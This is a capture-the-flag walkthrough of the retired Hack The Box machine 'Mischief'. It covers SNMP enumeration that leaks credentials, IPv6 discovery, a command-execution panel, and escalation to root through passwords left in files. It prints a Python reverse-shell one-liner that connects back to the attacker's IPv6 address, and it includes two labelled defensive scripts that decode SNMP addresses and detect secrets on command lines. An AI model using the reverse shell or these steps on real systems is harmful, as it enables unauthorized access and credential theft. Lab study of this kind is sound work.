HTB – Mischief

Today we are going to solve another CTF challenge, "Mischief". Mischief is a retired vulnerable lab from Hack The Box, which helps pentesters practise penetration testing online at their own level; they offer a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let's start off with an nmap version and default-script scan (-sV -sC) to find the open ports and services.

c:\Users\jacco>nmap -sV -sC 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

As you can see, this didn't give us much information, so I went on to scan the UDP ports, and that result showed port 161 open for SNMP.

c:\Users\jacco>nmap -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.029s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

Since we now knew that SNMP was enabled on the host, I ran nmap's SNMP enumeration scripts against port 161.

root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 9h48m31s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:80:1c (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.17 Mb sent, 1.58 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.20:15739
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:42621 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes: 
| 1: 
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2: 
| Name: kthreadd
--snip--
| 591: 
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 594: 
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 595: 
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 617: 
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
--snip--
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Service Info: Host: Mischief

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds

Hmmm!! Here I found something very interesting: the process list exposed over SNMP shows what looks like the login credentials used to authenticate to port 3366.

Let's navigate to port 3366 in the web browser and enter the following credentials.

Username: loki
Password: godofmischiefisloki

Here we were welcomed by the following web page, which held another credential. Let's find another way to make use of this credential for logging in.

We use a Python script called Enyx to find the IPv6 address of the target machine over SNMP. You can get the script from the GitHub repository cloned below.

root@kali:/opt# git clone https://github.com/trickster0/Enyx.git
Cloning into 'Enyx'...
remote: Enumerating objects: 70, done.
remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70
Unpacking objects: 100% (70/70), done.
root@kali:/opt# cd Enyx/
root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92
###################################################################################
# #
# ####### ## # # # # # #
# # # # # # # # # #
# ###### # # # ## ## #
# # # # # ## # # #
# ###### # ## ## # # #
# #
# SNMP IPv6 Enumerator Tool #
# #
# Author: Thanasis Tserpelis aka Trickster0 #
# #
###################################################################################


[+] Snmpwalk found.
Created directory: /var/lib/snmp/mib_indexes
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c
root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT
Nmap scan report for dead:beef::250:56ff:feb9:801c
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds
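Enyx gets those addresses from IP-MIB::ipAddressTable, which a read-only community string such as "public" hands out to anyone who asks; the IPv6 rows were the only thing that made the port-80 web panel reachable. The following added example (my own code, not the write-up's and not Enyx's) shows how the addresses are encoded in the OID index and decodes them from numeric snmpwalk output, so a defender can run the same parse against their own hosts to see exactly what an SNMP walk advertises. The sample walk lines are constructed: the IPv6 rows carry the three addresses reported by Enyx above, the IPv4 rows and interface indexes are assumptions. Scope labels come from Python's ipaddress module rather than from Enyx's own labels.

```python
import ipaddress
import re

# Column ipAddressIfIndex (IP-MIB::ipAddressTable). Every row is indexed by
# <addrType>.<length>.<address octets>, where addrType 1 = IPv4 and 2 = IPv6;
# walking this one column is enough to list every address the host has.
IPADDRESS_IFINDEX_OID = "1.3.6.1.2.1.4.34.1.3"

# Constructed sample of numeric (snmpwalk -On) output for the Mischief host;
# the IPv6 rows carry the three addresses Enyx reported above, the IPv4 rows
# and the interface indexes are assumed.
SAMPLE_WALK = """\
.1.3.6.1.2.1.4.34.1.3.1.4.10.10.10.92 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
.1.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
.1.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.128.28 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.128.28 = INTEGER: 2
"""

LINE_RE = re.compile(r"^\.?(?P<oid>[\d.]+)\s*=\s*INTEGER:\s*(?P<ifindex>\d+)\s*$")


def decode_ipaddress_index(index_parts):
    """Turn the OID index (addrType, length, octets...) into an ip_address object."""
    if len(index_parts) < 2:
        raise ValueError("index too short")
    addr_type, length, *octets = index_parts
    if len(octets) != length:
        raise ValueError("length field does not match the octet count")
    if any(not 0 <= o <= 255 for o in octets):
        raise ValueError("octet out of range")
    if addr_type == 1 and length == 4:
        return ipaddress.IPv4Address(bytes(octets))
    if addr_type == 2 and length == 16:
        return ipaddress.IPv6Address(bytes(octets))
    raise ValueError(f"unsupported address type/length {addr_type}/{length}")


def classify(addr):
    """Scope label derived from the address itself (ipaddress module), not from Enyx."""
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        return "link-local"
    if addr.is_private:
        return "private"
    return "global"


def parse_ipaddress_table(walk_lines):
    """Return [(ifindex, address, scope)] for each well-formed ipAddressIfIndex row."""
    prefix = IPADDRESS_IFINDEX_OID + "."
    rows = []
    for line in walk_lines:
        m = LINE_RE.match(line.strip())
        if not m or not m.group("oid").startswith(prefix):
            continue  # blank line, another column, or not numeric output
        try:
            index_parts = [int(p) for p in m.group("oid")[len(prefix):].split(".")]
            addr = decode_ipaddress_index(index_parts)
        except ValueError:
            continue  # a malformed row should not abort the whole parse
        rows.append((int(m.group("ifindex")), addr, classify(addr)))
    return rows


def reachable_ipv6(rows):
    """IPv6 addresses usable from another network: loopback and link-local dropped."""
    return [addr for _, addr, scope in rows
            if addr.version == 6 and scope not in ("loopback", "link-local")]


if __name__ == "__main__":
    table = parse_ipaddress_table(SAMPLE_WALK.splitlines())
    for ifindex, addr, scope in table:
        print(f"if{ifindex:<3} {scope:<11} {addr}")
    print("reachable over IPv6:", ", ".join(map(str, reachable_ipv6(table))))
```

Run with `snmpwalk -v2c -c <community> -On <host> 1.3.6.1.2.1.4.34.1.3 | python3 this_script.py` adapted to read stdin, or simply against the constructed sample as shown. The point for a defender is the last line of output: if a host advertises a global IPv6 address that the firewall and the monitoring only cover for IPv4, that is the gap this box was built around.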

So we open the target's IPv6 address in the web browser, and it presents a login page for a command execution panel. We try to log in to this page with the credentials we found earlier, but they were not valid.

Access Victim’s Shell


Next I brute-forced the username and successfully logged in with the following combination:

Since it was a command execution panel where we can run arbitrary system commands, this is an RCE that can easily be exploited to obtain a reverse shell from the target machine.

But before that, you must know the IPv6 address of your own machine, because that is the address the reverse shell will connect back to.

root@kali:/opt/Enyx# ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20
inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global>
inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 131 bytes 61874 (60.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 16553 (16.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

For the reverse shell, I use the Python reverse shell one-liner from pentestmonkey and change the connect-back address to our IPv6 address. Since both ends are speaking IPv6, we need a listener that supports it, such as ncat, so we start ncat listening on port 443.

root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@Mischief:/var/www/html$

Python reverse shell (the connect-back address is the tun0 IPv6 address of our machine):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As soon as we execute the Python code, we get a reverse connection on ncat, or on nc6.exe from https://www.sphinx-soft.com/tools/index.html if you are working from Windows.

Great!! You can see that we have access to a remote terminal, so let's try to find the user.txt file to complete our first task. We found user.txt in /home/loki but were unable to read it. However, there was another interesting file, "credentials", and in it we found another credential.

c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod

Since port 22 was open, we connect to the remote machine over SSH with this password and successfully read the user.txt file.

PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Apr 2 07:20:54 UTC 2019

System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied

While exploring further, I found the .bash_history file, which contained one more credential, for the root user; but loki does not have permission to execute the switch user (su) command.
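Both footholds on this box came from the same class of mistake: a password placed on a command line, once in the arguments of the SimpleHTTPAuthServer process (readable over SNMP through HOST-RESOURCES-MIB hrSWRunParameters, which is what nmap's snmp-processes output above is) and once in loki's .bash_history. The following added example is my own code, not part of the write-up, and is the kind of check a defender can run over a process table or a user's shell history to catch such leaks before an attacker does. The sample inputs are constructed: the SimpleHTTPAuthServer entries use the values shown on this page, while the mysql, curl and sshpass lines are constructed to exercise the other rules. The scanner reports where a secret was found and under which rule, and redacts the secret itself so the report can be shared.

```python
import re

# Constructed samples modelled on the two leak points in this write-up: process
# arguments as exposed over SNMP (hrSWRunParameters / nmap snmp-processes) and
# loki's .bash_history. The SimpleHTTPAuthServer lines use the page's values;
# the remaining command lines are constructed to exercise the other rules.
SAMPLE_PROCESS_ARGS = {
    595: "-m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/",
    601: "--defaults-file=/etc/mysql/my.cnf --bind-address=127.0.0.1",
    617: "-D",
}
SAMPLE_HISTORY = [
    "python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery",
    "exit",
    "mysql -u root -pSuperSecret123 shop",
    "curl -u admin:hunter2 http://127.0.0.1:3306/",
    "sshpass -p 's3cret pass' ssh loki@10.10.10.92",
    "ls -la",
]

# Each rule captures one common way a secret ends up on a command line. The
# rules are deliberately loose: the output is a list to review, not a verdict.
RULES = [
    ("mysql -p<pass>", re.compile(r"\bmysql\w*\s.*?\s-p(?P<secret>\S+)")),
    ("sshpass -p <pass>", re.compile(r"\bsshpass\s+-p\s+(?P<secret>'[^']*'|\"[^\"]*\"|\S+)")),
    ("--password=<pass>", re.compile(r"--password[= ](?P<secret>\S+)")),
    ("-u user:pass", re.compile(r"(?:\s-u|--user)\s+(?P<secret>[^\s:]+:(?!//)\S+)")),
    # bare user:pass token as SimpleHTTPAuthServer takes it; skips URL schemes,
    # numeric host:port pairs and secrets shorter than 6 characters
    ("user:pass token", re.compile(
        r"(?<![\w:/@.])(?P<secret>[A-Za-z][\w.-]*:(?!//)(?!\d+(?:\s|$))[^\s:@/]{6,})(?![\w:])")),
]


def redact(secret):
    """Keep the account name (if any) but never echo the secret itself."""
    secret = secret.strip("'\"")
    if ":" in secret:
        return secret.split(":", 1)[0] + ":***"
    return secret[:1] + "***"


def scan_line(text):
    """Return (rule_name, redacted_secret) for the first rule that fires, else None."""
    for name, pattern in RULES:
        m = pattern.search(text)
        if m:
            return name, redact(m.group("secret"))
    return None


def scan_process_args(process_args):
    """process_args: {pid: argument string}, e.g. from hrSWRunParameters or ps."""
    findings = []
    for pid, args in process_args.items():
        hit = scan_line(args)
        if hit:
            findings.append((f"pid {pid}",) + hit)
    return findings


def scan_history(lines):
    """lines: the contents of a shell history file, one command per entry."""
    findings = []
    for number, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            findings.append((f"history line {number}",) + hit)
    return findings


if __name__ == "__main__":
    for where, rule, shown in scan_process_args(SAMPLE_PROCESS_ARGS) + scan_history(SAMPLE_HISTORY):
        print(f"{where:<16} {rule:<20} {shown}")
```

On a live host the same two functions can be fed from `ps -eo pid,args` and from each user's history file. The fixes the findings point to are the usual ones: pass secrets through environment variables or a root-only config file rather than argv, and restrict or replace the default SNMP community so the process table is not world-readable in the first place.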

Therefore we move back to the www-data shell to run su and enter the password found above for the root login. We then look for root.txt inside the root directory, but there wasn't any flag, so we use the find command to enumerate the path of root.txt.

www-data@Mischief:/var/www/html$ su
su
Password: lokipasswordmischieftrickery

root@Mischief:/var/www/html# find / -name root.txt
find / -name root.txt
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae1*****807

Author: Jacco Straathof
